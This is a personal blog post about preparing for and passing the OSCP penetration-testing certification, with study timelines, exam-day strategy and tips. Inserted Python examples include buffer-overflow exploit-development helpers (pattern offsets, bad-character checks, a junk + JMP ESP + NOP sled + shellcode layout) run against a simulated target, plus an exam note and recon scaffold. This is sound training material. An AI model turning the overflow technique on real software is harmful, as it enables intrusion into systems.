My journey and recipe: How I passed the OSCP Certification

bigoteman
11 min read · Feb 8, 2021

Routing and switching to cybersecurity.

I started my IT career as a network engineer and spent almost 5 years in that role. My career goal at the time was to obtain the CCIE R&S certification (Cisco networking) and nail some cloud certifications. Unfortunately, I was laid off from my company permanently sometime in 2018. My dream of gaining CCIE status became dark and blurry.

I was jobless and in need of a job right away, since I had proposed to my girlfriend 2 months prior to being kicked out (need cash for the wedding, bro!). The cash flow could not stop. Time to hunt for networking roles!

Weeks and months passed by and still no one called with a job offer. Hopeless and cashless, I called my old manager from one of my previous employers. Unfortunately (at that time :D), an IT security role was offered to me, since I had prior experience with firewalls and basic network security. I only had two options: reject the offer to pursue my CCIE journey, or grab the cybersecurity role just to cover my monetary needs and forget the CCIE thing.

Time was not my friend and cash was king. I took the role and forced myself to learn the basics of IT security.

The deeper the hate, the deeper the love.

During my first few months, we were baselining the company's security posture. I was tasked at that time with performing firewall rule audits, and another colleague who knew some basic pentesting stuff and was eyeing the OSCP path was responsible for performing nmap scans on all IT assets. Being a cyber fetus at that time, I had no idea what nmap was or what it was used for. My colleague then showed me the results of his scans. I was amazed, astonished, fascinated and mind blown looking at the results. It is indeed a cool tool. I immediately switched persona from network guy to pentester wannabe. I was also fortunate to have a colleague who turned out to become my mentor on this journey.

Creating your own mental torture plan

Did you know that the eight-division boxing world champion Manny Pacquiao trains for 36 rounds when preparing for a scheduled fight? A boxing event only lasts 12 rounds. We can say that a 12-round fight is mere practice for Manny. Another champion, the late Black Mamba, Kobe Bryant (RIP), once said in an interview, "I never get bored with the basics". Watching Kobe on his workouts was pretty boring. Everything was basic, no flashy moves. He kept doing the same move for a couple of hours. For Kobe, the fundamentals of your craft are your core weapon for success.

Okay, enough of the cheesy story lines.

Here's the timeline of events of how I prepared for my OSCP journey.

March 2019

I took the CEHv10 course, which was shouldered by my employer. At this point, I was not 100% interested in the pentesting world. During this period, I spent most of my time trying to understand the basics of IT security and how governance, compliance, vulnerability management, SOC operations etc. relate to each other, so 2019 was just an appetizer for my OSCP adventure.

On top of that, I just played with Metasploit throughout the year to gain some interest in hacking, but not consistently.

Reference: https://information.rapid7.com/download-metasploitable-2017.html

January 2020

I read some articles on how to prepare for the OSCP exam, as suggested by my colleague, and ended up landing on abatchy's OSCP-like VMs. It was a disaster. I thought I had learned so much during my CEH course and from doing some Metasploit attacks. Eventually, I just read the writeups and absorbed the content. I lost interest at this point and felt that this was not my thing.

Reference: https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms

February 2020

I registered on HackTheBox and tried some of the easy active boxes. Another disaster.
To regain my interest, I subscribed to TryHackMe instead and promised myself that I would never visit HackTheBox again, lol. TryHackMe is a beginner-friendly platform for cybersecurity enthusiasts, which was a good fit for me.
I initially took the beginner path room and later progressed to the Offensive Pentesting room.

Reference: https://tryhackme.com/

March 2020 — September 2020

I was almost done with the TryHackMe Offensive Pentesting room (I didn't touch any of the buffer overflow boxes). COVID came and massive lockdowns were implemented worldwide. I took this opportunity to subscribe to HackTheBox, since I would be spending more time in front of my computer.

My mentor advised me to take a look at TJ Null's OSCP-like boxes on HackTheBox. It was a slow process for me to absorb the content on HTB. It took me a couple of months to feel comfortable playing with HTB machines.

Reference: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8
https://www.hackthebox.eu/

October 2020

Seven months passed by; at this point in time I had finished 41 of TJ Null's OSCP-like boxes on HTB. I would say 20 of those boxes were only pwned by reading writeups. I usually got stuck on enumeration and new attack vectors. For me, it is okay to take a look at writeups, as long as you did your best in the enumeration phase. There are things or techniques that you are still not aware of. It is okay and it's not a crime. ;)

List of boxes I owned (marked in gray) during the 7 months of HTB torture.

Since buffer overflow was part of the exam, this was the time I needed to learn and acquire this skill. For this topic I watched The Cyber Mentor's buffer overflow tutorial on YouTube. I then went back to the TryHackMe Offensive Pentesting room to nail the buffer overflow boxes. I also checked out justinsteven's buffer overflow tutorial on GitHub and the vortex buffer overflow guide.

After finishing the buffer overflow boxes in the 3rd week of October, I decided to take the 60-day OSCP course.

References:

https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
https://github.com/justinsteven/dostackbufferoverflowgood
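The workflow those buffer overflow tutorials drill (crash the service with a cyclic pattern, read EIP off the debugger to recover the offset, hunt bad characters one round at a time, then lay out junk + return address + NOP sled + shellcode) as an added Python example. This is not code from the original post or from the tutorials linked above; the crash is simulated in-process so it runs offline, and the 524-byte buffer, the `\x0a` bad character and the `0x625011AF` JMP ESP address are made-up values standing in for what Immunity Debugger and mona would report.

```python
"""
Stack buffer overflow bookkeeping for the 32-bit targets used in OSCP prep
(Brainpan, dostackbufferoverflowgood, vortex's practice binaries).
Added example; buffer size, bad character and JMP ESP address are constructed.
"""
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def cyclic_pattern(length):
    """Metasploit pattern_create equivalent: 'Aa0Aa1Aa2...'. Every 4-byte
    window in the first 20280 bytes is unique, so whatever lands in EIP maps
    back to exactly one offset regardless of alignment."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_PATTERN)
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip_hex):
    """Metasploit pattern_offset equivalent. The debugger prints EIP as a
    number (e.g. 41367241); the bytes that overwrote it sit in memory
    little-endian, so pack it '<I' before searching the pattern."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value %s not found in pattern" % eip_hex)
    return idx


def simulated_eip(pattern, saved_eip_offset):
    """Stand-in for the real crash: EIP as the debugger would display it when
    the 4 pattern bytes at saved_eip_offset overwrite the return address."""
    chunk = pattern[saved_eip_offset:saved_eip_offset + 4]
    return "%08x" % struct.unpack("<I", chunk)[0]


def badchar_probe(exclude=(0x00,)):
    """\\x00..\\xff minus the characters already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent, dumped):
    """Compare the probe with what the debugger dumped from the stack. Only
    the first divergence is trustworthy: after a bad byte the rest of the
    buffer is often truncated or shifted, so the check is repeated, adding
    one bad byte to the exclude list per round. Returns None when clean."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def build_exploit(offset, jmp_esp, shellcode, nop_sled=16):
    """Classic layout: junk up to EIP, little-endian address of a JMP ESP
    gadget, NOP sled, then the shellcode that ESP now points at."""
    return b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nop_sled + shellcode


def demo():
    """Walk the workflow against a simulated target with a 524-byte buffer
    (saved EIP at offset 528) whose input handling drops everything from
    \\x0a onward. All target behaviour here is constructed."""
    pattern = cyclic_pattern(2000)
    eip = simulated_eip(pattern, 528)          # what Immunity would show
    offset = pattern_offset(pattern, eip)

    bad = [0x00]
    probe = badchar_probe(exclude=bad)
    dumped = probe[:probe.index(0x0a)]         # constructed: target truncates at \n
    bad.append(first_badchar(probe, dumped))
    probe = badchar_probe(exclude=bad)
    second_round = first_badchar(probe, probe) # constructed: round two survives intact

    payload = build_exploit(offset, 0x625011AF, b"\xcc" * 4)  # hypothetical JMP ESP
    return {"eip": eip, "offset": offset, "badchars": bad,
            "second_round_clean": second_round is None, "payload_len": len(payload)}


if __name__ == "__main__":
    print(demo())
```

On a real box the `simulated_eip` step is replaced by reading EIP in Immunity Debugger, and `dumped` by a right-click "follow in dump" of ESP after sending the probe; the rest of the helpers are used unchanged. Run the debugger and the target as administrator, as noted later in the post, or the process will not pause at the crash and you will be debugging the wrong thing.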

November 2020 — Dec 2020

On day 1 of my OSCP course, I found out that the PDF material is 800+ pages long, so I decided to skip reading the material and the exercises. From my perspective, the 60-day subscription is not enough to finish all the material plus the labs, hence I went straight to the lab environment.

I was able to finish all the boxes in the lab. It took me roughly 40–45 days to finish everything.

Since nothing was left for me, I read the PDF material and decided to schedule my exam for the 14th of January. I did not pursue creating a lab/exercise report. It was pure dirty labs.

Exam Preparation

My lab access ended on the 1st of January. If you do the math, I had 13 days to prepare for the exam.

Day 1 to 4 [HTB] — I did easy-to-medium active HTB boxes. My plan was to own 1 box a day. Eventually I ended up rooting 5 active boxes.

Day 5 to 7 [THM] — I repeated some machines in the TryHackMe Offensive Pentesting room. As far as I remember, I only did 3 boxes here.

Day 8 to 10 [BOF] — I went back to TryHackMe and redid the buffer overflow rooms. I also revisited justinsteven's and vortex's BO tutorials. It took me 2 days to finish everything here, and I used my remaining day to look for other platforms that could simulate a 24-hour mock exam.

I was struggling to choose between OffSec Proving Grounds and the h4cklife mock exam (VulnHub boxes).

Since my laptop didn't have enough disk space, I decided to subscribe to OffSec Proving Grounds for my 24-hour mock exam.

Reference: https://h4cklife.org/posts/a-pre-exam-for-future-oscp-students/
https://www.offensive-security.com/labs/

Day 11 [REST] — I did nothing here except create a plan and choose which 4 boxes on Proving Grounds I would take on in my mock exam. Here's the summary of the boxes I randomly selected.

Buffer Overflow — Brainpan on THM
Easy — Windows
Intermediate — Windows
Intermediate — Windows
Hard — Linux

Note: I intentionally selected 3 Windows boxes for the easy and intermediate slots, since hacking Windows is a pain in the a**.

Day 12 [MOCK EXAM] — I was able to finish all the boxes within 16 hours. It was cool, and at this point I was confident that I would pass the exam.

Day 13 [MOCK EXAM REPORTING] — I decided not to do the report and to take a rest instead.

EXAM DAY!

My exam was scheduled for 5pm local time. My plan was to take the BOF-25-20-20-10 path, or the BOF-10-20-20-25 path as plan B, and have the passing grade at the 12-hour mark.

For the BOF machine, I was able to finish in approximately 1 hour and 30 minutes. I should have been able to finish it in much less time, since I wasted so much time by not running Immunity Debugger and the application as an administrator. The application was not pausing and was showing a terminated status, bla bla. I was really nervous and hopeless during this period, so I suggest you just relax and do not overthink when things are not working. Everything is going to be fine. Trust me. ;)

While doing the BOF machine, I was running AutoRecon on both the 25-pointer and the 10-pointer machines. Judging from the AutoRecon results, and still having the hangover of the BOF machine disaster, the 25-pointer seemed to require more time to enumerate than the 10-pointer, so I went with the plan B path (BOF-10-20-20-25) instead.

Long story short, my 12-hour goal was really unrealistic given my skills and time management. I was able to finish BOF-10-20 within 10 hours but struggled on the foothold of both the remaining 20-pointer and the 25-pointer machine. At the 12-hour mark, I was able to gain a user shell on the 25-pointer. I then decided to skip the 20-pointer and spend all my remaining time on the privilege escalation of the hard machine, just to play safe.

Now it was 5 in the morning and I needed to regenerate and unwind my head. I had 4 hours of sleep (which felt like only 15 minutes) and woke up around 9 am.

Moving on to the 20-hour mark, there was still no progress on the privilege escalation; however, I had this public exploit that did not seem to be working at all, and I was about 80% sure that this was the right path.

With 4 hours left on my clock, I used the forbidden skill of the OSCP: the Metasploit bazooka. In just a couple of minutes, poof! I gained root privileges on the machine around the 22-hour mark. Having too little time left to pwn the 20-pointer, I used the remaining two hours to validate my screenshots on all boxes. Metasploit was definitely a life saver.

I finished the exam with only 80 points (BOF-10-20-25), leaving the 20-point box with just an nmap scan, XD.

Reference: https://github.com/Tib3rius/AutoRecon

Exam Report

I regret not doing the report on my mock exam simulation. Creating the report is not that easy if you are a first timer; you need to provide a step-by-step guide using the screenshots you gathered. Additionally, you need to describe each step and check your grammar. I also made an honest mistake here: I overslept after finishing the exam, lol. I think I only had 6 hours to complete and submit the report. So my suggestion is to practice creating a report prior to taking the exam, so that you have hands-on experience of how to create one.

My personal tip for beginners:

Assuming you have zero knowledge for the OSCP, I suggest subscribing to TryHackMe first. Learn the basics here: networking, Linux, Windows, nmap etc. Everything you need is there. Once you think you are good to go and have learned all the basics, move up to the Offensive Pentesting room.

Next in line for you is HackTheBox: subscribe and pwn as much as you can using TJ Null's OSCP-like list. This is not beginner friendly; try to register an account there, then tell me if it's a beginner-friendly platform. ;)

https://www.hackthebox.eu/

If you think you have the guts and skills to take the exam, do not enroll yet. Try to pwn 3–4 active boxes on HTB. If you own two or more active boxes without any help, I think you are all set to take the OSCP course.

Now it's time to choose your poison: how many days should you take? In my situation, I needed to manage my time, since I am a married man and have responsibilities to fulfill at home.

Prior to taking the course, I set myself the goal of owning at least 1 box per day and ending the course with at least 50 lab machines owned. The 60-day subscription was a perfect fit for me.

As mentioned earlier, I went straight to the labs on day 1. I really recommend this approach only if you already have a solid understanding of hacking methodologies or are already a seasoned pentester.

The 90-day subscription, on the other hand, can be an option too if you want to take the course as intended by OffSec.

My Golden Tip

Learning Phase:

  • Try to be comfortable using manual tools; never use automated reconnaissance tools or Metasploit during this stage.
  • Google is your friend. Be crafty with your search keywords: try adding shell, exploit, hack, pentest, hackthebox, htb etc. to them.
  • Enumerate manually; stress all the ports/services/applications.
  • Take notes. Jot down everything; take screenshots of your initial foothold, how you gained a shell, privilege escalation, etc.

During the entire OSCP Course:

  • Be goal oriented: I am talking about how many boxes you want to own by the end of your lab time.
  • At this stage you may use automated reconnaissance tools or Metasploit on the lab machines, so that you are familiar with how to use these tools during the exam. I used AutoRecon for enumeration and winPEAS/linPEAS to find privilege escalation attack vectors. These tools will save you a lot of time during the 24-hour exam.
  • Again, take notes. Aside from documenting your attack vectors, the lab environment is designed to be an actual corporate network. Some machines contain information that can be used to access other machines, applications, etc.
  • Read and watch the materials. You paid for them. Use them.

Reference:

https://github.com/Tib3rius/AutoRecon

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

Exam Day:

  • Make sure you had a nice and decent sleep the night before your exam.
  • Make sure you have a backup (snapshot) of your attack box. What if your Kali crashes during the exam?
  • Food and refreshments should be available at all times. Eat and drink. Don't die.
  • Start with the buffer overflow. Kick off AutoRecon against the other 4 boxes while you work on the BO.
  • Skip a box if nothing seems to be working for 2 hours.
  • Take notes and screenshots.
  • Once finished with a box, revisit your notes. Read them again. Check whether you missed something.
  • Sleep. Stop enumerating. 4–5 hours is enough.
  • Metasploit can save you, but the exam guide allows it against only one target, so save it for the box where you are most sure of the path.
  • Creating the report is very easy as long as you have a good amount of time and have gathered the essential screenshots and notes for each box.
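The first three technical bullets above (start with the BOF, run AutoRecon on the other boxes in the background, keep notes and screenshots per box) as an added Python exam-start script. This is not code from the original post or from the AutoRecon project; the per-target directory layout, the notes template and the target list are assumptions, and AutoRecon's `-o` (output directory) flag is the only real CLI option it relies on.

```python
"""
Exam-start scaffold: one directory per target with a notes template, a
screenshots folder and AutoRecon running detached so enumeration happens
while you work the BOF box by hand. Added example; layout and targets are
constructed, not taken from the original post.
"""
import os
import shutil
import subprocess
import tempfile

# Constructed target list (RFC 5737 documentation addresses, not exam IPs).
TARGETS = {"bof": "192.0.2.10", "25pt": "192.0.2.25",
           "20pt-a": "192.0.2.20", "20pt-b": "192.0.2.21", "10pt": "192.0.2.30"}

NOTES_TEMPLATE = """# {label} ({ip})

## Enumeration
- [ ] AutoRecon full TCP results reviewed
- [ ] every service poked manually (not just the scanner output)

## Foothold
(exploit / credentials used, exact command, screenshot of whoami + ip/ipconfig)

## Privilege escalation
(vector, exact command, screenshot of proof.txt with ip/ipconfig in the same frame)

## Proof
- local.txt:
- proof.txt:
"""


def scaffold_target(root, label, ip):
    """Create <root>/<label>-<ip>/{screenshots,loot,recon} plus notes.md.
    Existing notes are never overwritten, so re-running mid-exam is safe."""
    target_dir = os.path.join(root, "%s-%s" % (label, ip))
    for sub in ("screenshots", "loot", "recon"):
        os.makedirs(os.path.join(target_dir, sub), exist_ok=True)
    notes = os.path.join(target_dir, "notes.md")
    if not os.path.exists(notes):
        with open(notes, "w") as fh:
            fh.write(NOTES_TEMPLATE.format(label=label, ip=ip))
    return target_dir


def launch_recon(target_dir, ip, autorecon=shutil.which("autorecon")):
    """Start AutoRecon detached for one target, logging to recon/autorecon.log.
    One process per target (rather than one autorecon with all IPs) so a hung
    scan can be killed per box via the recorded pid. Returns the pid, or None
    when autorecon is not installed (the command is logged instead)."""
    recon_dir = os.path.join(target_dir, "recon")
    log_path = os.path.join(recon_dir, "autorecon.log")
    cmd = [autorecon or "autorecon", "-o", recon_dir, ip]
    if autorecon is None:
        with open(log_path, "w") as fh:
            fh.write("autorecon not found; would run: %s\n" % " ".join(cmd))
        return None
    with open(log_path, "w") as log:
        proc = subprocess.Popen(cmd, stdout=log, stderr=subprocess.STDOUT,
                                stdin=subprocess.DEVNULL, start_new_session=True)
    with open(os.path.join(recon_dir, "autorecon.pid"), "w") as fh:
        fh.write(str(proc.pid))
    return proc.pid


def exam_start(root, targets, launch=True):
    """targets: {label: ip}. The BOF box gets a directory but no AutoRecon,
    since you work it by hand first. Returns {label: target_dir}."""
    dirs = {}
    for label, ip in targets.items():
        dirs[label] = scaffold_target(root, label, ip)
        if launch and label != "bof":
            launch_recon(dirs[label], ip)
    return dirs


def demo(root=None):
    """Dry run under a temp dir: scaffold, log what AutoRecon would be given,
    and confirm a second scaffold pass keeps hand-written notes."""
    root = root or tempfile.mkdtemp(prefix="oscp-exam-")
    dirs = exam_start(root, TARGETS, launch=False)
    pids = {label: launch_recon(d, TARGETS[label], autorecon=None)
            for label, d in dirs.items() if label != "bof"}
    marker = os.path.join(dirs["25pt"], "notes.md")
    with open(marker, "a") as fh:
        fh.write("\nfound creds in web.config\n")
    scaffold_target(root, "25pt", TARGETS["25pt"])
    with open(marker) as fh:
        preserved = "web.config" in fh.read()
    logs = all(os.path.exists(os.path.join(d, "recon", "autorecon.log"))
               for label, d in dirs.items() if label != "bof")
    return {"root": root, "dirs": dirs, "pids": pids,
            "logs_exist": logs, "notes_preserved": preserved}


if __name__ == "__main__":
    print(demo())
```

For the real thing, call `exam_start(os.path.expanduser("~/oscp-exam"), {...})` with the IPs from your exam control panel, then `kill $(cat <target>/recon/autorecon.pid)` for any scan you decide to abandon; the `notes.md` headings double as the skeleton of the report sections you will need for each box.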

That's all from me. I am sorry for the dramatics and the long post, but anyway, you managed to read this far, so I think you enjoyed every part of it. :)

-bigoteman
